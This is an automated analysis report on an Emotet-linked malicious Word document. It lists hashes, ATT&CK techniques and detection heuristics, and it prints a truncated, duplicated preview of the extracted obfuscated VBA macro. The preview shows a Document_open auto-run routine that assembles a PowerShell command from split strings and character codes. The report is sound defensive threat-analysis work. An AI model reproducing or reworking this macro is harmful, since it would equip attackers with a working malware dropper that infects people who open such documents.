Emotet Office (OLE) malware analysis — malicious · ca5fd27145d1576b

MALICIOUS

Office (OLE)

301.5 KB Created: 2018-07-12 07:09:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: c2f9fe27bf8ef77953b4867e0a8e3a46 SHA-1: 9597dead3e064f50d6361d1991bbaf6dc3d9525e SHA-256: ca5fd27145d1576bc9c4da77daf29202e7f9ca7c12377ab068707d245dbfd0eb

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The critical 'OLE_VBA_SHELL' heuristic indicates the use of the Shell() function, and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic confirms an auto-execution macro ('Document_open') that uses Shell() to execute code. The ClamAV detection 'Doc.Downloader.Emotet-6877387-0' strongly suggests the Emotet family, which commonly uses this technique to download and execute further stages. The VBA macro itself, named 'JaiaQVojf', contains obfuscated code that likely orchestrates the download and execution of a payload.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6877387-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6877387-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34378 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	34378 bytes
SHA-256: `c703ce42fb1bd5af4d545b2ea2221073e7f61f1ecffb61c8d924a8e1e93e6cc2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "JaiaQVojf" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next kOhVoc = (56231 + jEFNpq / (10751 + CKSRsw)) RnjVa = (75958 + oCMEUs / (59501 + ahsvJz)) LskzA = (23602 + MLcpC / (44497 + QiLQb)) wiZiCw = (64024 + zTvqtI / (60967 + BojSrp)) jpVEOuHSRlT = Application.Run("QLcNwiVpEY", "" + fXQTYXA + bEAwHJtKQLclk + WwJffLf + MdPizjV + ioKiwd + zcjUP + ZYSfdOBo + GawHTvKq + VUlBosQW + StfwinVTi + AMuMXzRP + HbZQL + WkzjQUIP + NKQzNbTLJ) dRlrK = (55008 + wjIKHb / (61905 + hMiwm)) vRckqT = (84186 + dKYus / (37498 + pGrNR)) End Sub Attribute VB_Name = "DDpRztH" Function WwJffLf() On Error Resume Next HAIPi = 81049 / TvpIv * XzhVY + PIEzw + 27452 / jjpkjh * jPQCNi / TBtPP * (XjFHY / 9226 + 71250 / wCAKAh) VzLGsRtz = "" + LFaPpHjiIqM + LkiHaCih + "PoWE" + wvmNQsMBCnX + prhZWdQO + "rsh" + pqPctGDBwzaiT + SmvoKHjdbtQsdI + "eLL" + QYHwWAPTuwmahi + ifDrUaNjFM + " " cNatsD = (20242 / 12501 * (GWSWc * MVJwti - OwENbq / aqKNj * (83030 + 63361 / 47002 - idXELX))) cqjOQB = "" + sjBLwQuAjw + icUwlQMFqkMnb + Chr(34) + " ( " + VijrpTsjJ + utTfHiwFD + "'36" WwJffLf = "" + HaGvfiH + kVwYWCHmU + VzLGsRtz + KnXWSmKdirWXQS + ltnNbpu + cqjOQB vuJEa = (20041 / 70192 * (HsUDk * tUdpWN - hFzwWs / ZRVtsz * (44796 + 82943 / 2114 - DjmGJ))) DAQut = (96047 / 1210 * (RaNpJ * ESDrp - aKmFC / Elqbr * (47292 + 59454 / 94240 - VbmjTU))) End Function Function MdPizjV() On Error Resume Next JBrRz = (27846 / 66036 * (TDbsN * rZtPh - ipKMOj / RLWCEj * (29469 + 92917 / 2072 - nmbsdF))) cKzlVE = (53518 / 52363 * (ZzsJB * IVbjo - kHnpoz / wBEHLY * (74343 + 62023 / 1164 - HBVdb))) BHQvG = (51519 / 10071 * (lpUqiC * XRCzB - IwOqz / dFwEj * (67931 + 83939 / 25561 - aWFvwQ))) aRfkCNHzz = "" + RZRwZVjJqr + vhHjiGVq + "q106" + OYIBUiTGIwtU + dAcjaBiudq + "f105" + uozVnDnjKto + wpjiEQb + "w9" + DiimQfDTuRdu + HnKqjqNkLDi + "9z6" + wMZZwQLk + BmIdqwXuGKKbu + "1q11" vTVTTa = (7818 / 78696 * (EHVrh * cumzJD - MXlnJ / QBXRfz * (1506 + 92772 / 80798 - BQzzp))) cfNciP = zkWXGz * fRcYRh * qsjhmd - jLFino - (Ivwil * Tucdps / WzUZXs + mnhuvm) nujJVSzRv = "" + QpTIYXVdpf + vQDsutOhrj + "0%1" + wVVODnzdDVLnWj + drkrtWrWdCAspj + "01" + iXMCCHZBjVSZ + WKiPDzwSC + "!1" + wkBmGnUoaJw + wWRiLXDR + "19" + jqJafhoLV + DWYPZhwliG + "m45z" bShiOH = WMhWVw * NoGmzd * jtAtSl - EjmIID - (HwzZEq * LWzCT / TKirIu + rZjov) SjuOMs = FqHMt * WXWAqz * WuCvz - CriRK - (iCwfcl * aOOTWf / GfTCj + vNRYdz) fNmAb = "" + WWZwiLlZstOAY + afPlHWXf + "11" + iUkYCdWs + ruazCVFbIRzWT + "1m98" + zjdqTzrojzqAAq + IoBRfFSilRwXS + "f10" + BbaEutBQ + GqzLVFk + "6V10" + oiRrSrQuFC + VUnpYZlWwH + "1f" + RZPVWQLL + adjkIMdwwOpjk + "99%" + WwfwWbhK + tcvYoqrpctK + "116w" RZszLJ = lotLA * jMHRt * aJPki - HXwqIc - (QHOZic * AppFj / YUKihL + rfiCp) RViOhsnSGTB = "" + lUufQMj + ndpWSlUJA + "32c7" + mNUIzcH + LkUCSOUuZSX + "8q1" + rrEWdYtK + LWRXAlioEwjGC + "01" + DEQZkibNdWdE + jrSTwJfBqUJqiS + "G116" + loujZUdkHF + nBXjHpVG + "V46%" + FzGCNvQtDJXE + JqYPNhLqZWOoz + "87f1" + pzjHwivdXHhU + aliRiWQ + "01%9" + tjaOajn + oKOLozlFONBIjN + "8w" + zkjXOFSYrqYXT + kijfEnOzlfdIDP + "67" Wdabz = Ajirp * zYNlt * QZwht - kmvsk - (PJtdCu * tucizz / wuAMR + OjwYQo) qMMIw = cjaUWT * zYorwk * Cpmjas - fKVNNK - (CiQZA * jRUjp / AOKKhT + CWBad) boNazbTKizi = "" + zVFHIJX + XRwYzkVGtcrUU + "V1" tJHzBH = ruJmvP * jpdRT * QXfFmj - jFOic - (RNzBa * jkZBPL / FhMnOD + NYWiC) bHVOWEOSPV = "" + ElfbJZwLhnCVk + VPtwamWSzicIs + "08%1" + zPaufnVoCP + fzMhPKhAOI + "05" + ChTjwjRFTNnmvq + AbrhSPr + "c1" + zMzLrFrBfswUp + wCCSMZlZni + "01%1" + RjcmqAszUTtcH + QzYiKiVjPNZG + "10%" + mKhqSaUC + TwtBiJZK + "116G" + VcPvpEvzMYQui + JMloVROqQONp + "59" + GnOpaqK + BNfXphrZRFUV + "m36" WvWHlz = (bObtGl / FEwWO - kbqtYI * pvjzi) * (zstDj + vEZwD - 57544 + woUNIz) hLcbnphmw = "" + vFcicar + cKvlKLANwSW + "z70q" + mQoM ... (truncated)

SHA-256: c703ce42fb1bd5af4d545b2ea2221073e7f61f1ecffb61c8d924a8e1e93e6cc2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "JaiaQVojf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   kOhVoc = (56231 + jEFNpq / (10751 + CKSRsw))
   RnjVa = (75958 + oCMEUs / (59501 + ahsvJz))
   LskzA = (23602 + MLcpC / (44497 + QiLQb))
   wiZiCw = (64024 + zTvqtI / (60967 + BojSrp))
jpVEOuHSRlT = Application.Run("QLcNwiVpEY", "" + fXQTYXA + bEAwHJtKQLclk + WwJffLf + MdPizjV + ioKiwd + zcjUP + ZYSfdOBo + GawHTvKq + VUlBosQW + StfwinVTi + AMuMXzRP + HbZQL + WkzjQUIP + NKQzNbTLJ)
   dRlrK = (55008 + wjIKHb / (61905 + hMiwm))
   vRckqT = (84186 + dKYus / (37498 + pGrNR))
End Sub


Attribute VB_Name = "DDpRztH"
Function WwJffLf()
On Error Resume Next
HAIPi = 81049 / TvpIv * XzhVY + PIEzw + 27452 / jjpkjh * jPQCNi / TBtPP * (XjFHY / 9226 + 71250 / wCAKAh)
VzLGsRtz = "" + LFaPpHjiIqM + LkiHaCih + "PoWE" + wvmNQsMBCnX + prhZWdQO + "rsh" + pqPctGDBwzaiT + SmvoKHjdbtQsdI + "eLL" + QYHwWAPTuwmahi + ifDrUaNjFM + "   "
cNatsD = (20242 / 12501 * (GWSWc * MVJwti - OwENbq / aqKNj * (83030 + 63361 / 47002 - idXELX)))
cqjOQB = "" + sjBLwQuAjw + icUwlQMFqkMnb + Chr(34) + " ( " + VijrpTsjJ + utTfHiwFD + "'36"
WwJffLf = "" + HaGvfiH + kVwYWCHmU + VzLGsRtz + KnXWSmKdirWXQS + ltnNbpu + cqjOQB
   vuJEa = (20041 / 70192 * (HsUDk * tUdpWN - hFzwWs / ZRVtsz * (44796 + 82943 / 2114 - DjmGJ)))
   DAQut = (96047 / 1210 * (RaNpJ * ESDrp - aKmFC / Elqbr * (47292 + 59454 / 94240 - VbmjTU)))
End Function
Function MdPizjV()
On Error Resume Next
JBrRz = (27846 / 66036 * (TDbsN * rZtPh - ipKMOj / RLWCEj * (29469 + 92917 / 2072 - nmbsdF)))
   cKzlVE = (53518 / 52363 * (ZzsJB * IVbjo - kHnpoz / wBEHLY * (74343 + 62023 / 1164 - HBVdb)))
   BHQvG = (51519 / 10071 * (lpUqiC * XRCzB - IwOqz / dFwEj * (67931 + 83939 / 25561 - aWFvwQ)))
aRfkCNHzz = "" + RZRwZVjJqr + vhHjiGVq + "q106" + OYIBUiTGIwtU + dAcjaBiudq + "f105" + uozVnDnjKto + wpjiEQb + "w9" + DiimQfDTuRdu + HnKqjqNkLDi + "9z6" + wMZZwQLk + BmIdqwXuGKKbu + "1q11"
vTVTTa = (7818 / 78696 * (EHVrh * cumzJD - MXlnJ / QBXRfz * (1506 + 92772 / 80798 - BQzzp)))
   cfNciP = zkWXGz * fRcYRh * qsjhmd - jLFino - (Ivwil * Tucdps / WzUZXs + mnhuvm)
nujJVSzRv = "" + QpTIYXVdpf + vQDsutOhrj + "0%1" + wVVODnzdDVLnWj + drkrtWrWdCAspj + "01" + iXMCCHZBjVSZ + WKiPDzwSC + "!1" + wkBmGnUoaJw + wWRiLXDR + "19" + jqJafhoLV + DWYPZhwliG + "m45z"
bShiOH = WMhWVw * NoGmzd * jtAtSl - EjmIID - (HwzZEq * LWzCT / TKirIu + rZjov)
   SjuOMs = FqHMt * WXWAqz * WuCvz - CriRK - (iCwfcl * aOOTWf / GfTCj + vNRYdz)
fNmAb = "" + WWZwiLlZstOAY + afPlHWXf + "11" + iUkYCdWs + ruazCVFbIRzWT + "1m98" + zjdqTzrojzqAAq + IoBRfFSilRwXS + "f10" + BbaEutBQ + GqzLVFk + "6V10" + oiRrSrQuFC + VUnpYZlWwH + "1f" + RZPVWQLL + adjkIMdwwOpjk + "99%" + WwfwWbhK + tcvYoqrpctK + "116w"
RZszLJ = lotLA * jMHRt * aJPki - HXwqIc - (QHOZic * AppFj / YUKihL + rfiCp)
RViOhsnSGTB = "" + lUufQMj + ndpWSlUJA + "32c7" + mNUIzcH + LkUCSOUuZSX + "8q1" + rrEWdYtK + LWRXAlioEwjGC + "01" + DEQZkibNdWdE + jrSTwJfBqUJqiS + "G116" + loujZUdkHF + nBXjHpVG + "V46%" + FzGCNvQtDJXE + JqYPNhLqZWOoz + "87f1" + pzjHwivdXHhU + aliRiWQ + "01%9" + tjaOajn + oKOLozlFONBIjN + "8w" + zkjXOFSYrqYXT + kijfEnOzlfdIDP + "67"
Wdabz = Ajirp * zYNlt * QZwht - kmvsk - (PJtdCu * tucizz / wuAMR + OjwYQo)
   qMMIw = cjaUWT * zYorwk * Cpmjas - fKVNNK - (CiQZA * jRUjp / AOKKhT + CWBad)
boNazbTKizi = "" + zVFHIJX + XRwYzkVGtcrUU + "V1"
tJHzBH = ruJmvP * jpdRT * QXfFmj - jFOic - (RNzBa * jkZBPL / FhMnOD + NYWiC)
bHVOWEOSPV = "" + ElfbJZwLhnCVk + VPtwamWSzicIs + "08%1" + zPaufnVoCP + fzMhPKhAOI + "05" + ChTjwjRFTNnmvq + AbrhSPr + "c1" + zMzLrFrBfswUp + wCCSMZlZni + "01%1" + RjcmqAszUTtcH + QzYiKiVjPNZG + "10%" + mKhqSaUC + TwtBiJZK + "116G" + VcPvpEvzMYQui + JMloVROqQONp + "59" + GnOpaqK + BNfXphrZRFUV + "m36"
WvWHlz = (bObtGl / FEwWO - kbqtYI * pvjzi) * (zstDj + vEZwD - 57544 + woUNIz)
hLcbnphmw = "" + vFcicar + cKvlKLANwSW + "z70q" + mQoM
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.